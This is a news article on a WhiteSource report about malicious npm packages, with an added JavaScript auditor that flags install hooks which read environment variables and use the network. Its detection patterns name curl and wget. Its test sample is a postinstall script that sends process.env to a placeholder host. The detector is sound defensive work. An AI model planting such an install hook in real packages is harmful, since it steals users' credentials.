The WhiteSource research report, released February 2, was based on data culled using the WhiteSource Diffend malware detection platform. WhiteSource said it has reported more than 1,300 malicious packages to NPM in the past six months.
Malware subsequently removed by NPM was found to be stealing both credentials and cryptocurrency and running botnets, said WhiteSource.
The company said that nearly 14 per cent of the malicious packages detected were designed to steal sensitive information such as credentials present in environment variables. While attackers using malicious packages often do not target particular companies or entities, some packages were designed to target certain systems.
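The credential-stealing behaviour described above typically lives in a package's install-time lifecycle scripts, which run automatically when the package is installed. The following is an added example, not code from the WhiteSource report or from the Diffend platform: a small heuristic audit that flags packages whose `preinstall`/`install`/`postinstall`/`prepare` hooks both read environment variables and use the network. The manifest and source snippet it inspects are constructed for illustration; the regexes are an assumed, deliberately simple heuristic rather than a real detection signature.

```javascript
// Added example (not from the WhiteSource report): heuristic audit of npm
// install-time lifecycle scripts. Flags the pattern the report describes,
// where an install hook reads environment variables and contacts the network.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Assumed heuristics: evidence that a script reads environment variables
// (Node's process.env or a shell-style $VARIABLE) and that it reaches the
// network (Node network modules, fetch, or common CLI download tools).
const ENV_READ = /process\.env\b|\$\{?[A-Z_]{3,}\}?/;
const NETWORK_USE = /\brequire\(['"](https?|net|dns|dgram)['"]\)|\bfetch\(|\bcurl\b|\bwget\b/;

// manifest: parsed package.json; sources: map of file name -> file contents
// for the package, so "node <file>" hooks can be resolved to the file body.
function auditPackage(manifest, sources) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // If the hook just runs a bundled script, inspect that script's body.
    const m = cmd.match(/\bnode\s+(\S+)/);
    const body = m && sources[m[1]] !== undefined ? sources[m[1]] : cmd;
    const readsEnv = ENV_READ.test(body);
    const usesNet = NETWORK_USE.test(body);
    if (readsEnv && usesNet) {
      findings.push({ hook, severity: 'high',
        reason: 'install hook reads environment variables and uses the network' });
    } else if (readsEnv || usesNet) {
      findings.push({ hook, severity: 'low',
        reason: readsEnv ? 'install hook reads environment variables'
                         : 'install hook uses the network' });
    }
  }
  return findings;
}

// Constructed sample: a package whose postinstall script serialises
// process.env and sends it to a remote host (hostname is a placeholder).
const SAMPLE_MANIFEST = {
  name: 'example-widget',
  version: '1.0.0',
  scripts: { postinstall: 'node setup.js', test: 'node test.js' },
};
const SAMPLE_SOURCES = {
  'setup.js': [
    "const https = require('https');",
    'const data = JSON.stringify(process.env);',
    "https.request({ host: 'example.invalid', method: 'POST' }).end(data);",
  ].join('\n'),
};

console.log(JSON.stringify(auditPackage(SAMPLE_MANIFEST, SAMPLE_SOURCES), null, 2));
```

A hit from this audit is a prompt for manual review rather than proof of malice: legitimate build tooling also reads `$HOME` or `process.env` during install, so the `low` findings in particular will include false positives. Running such a check in CI against newly added or updated dependencies, alongside `npm install --ignore-scripts` where the build allows it, limits how much an install hook can do before anyone looks at it.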
Note that NPM does contain nearly two million packages, so 1,300 malicious packages amounts to significantly less than one percent.
WhiteSource described NPM as the most widely used package manager of any language, with the number of packages in the registry having grown from 1.3 million in April 2020 to more than 1.8 million today. Some 32,000 new packages were published monthly in 2021, according to WhiteSource.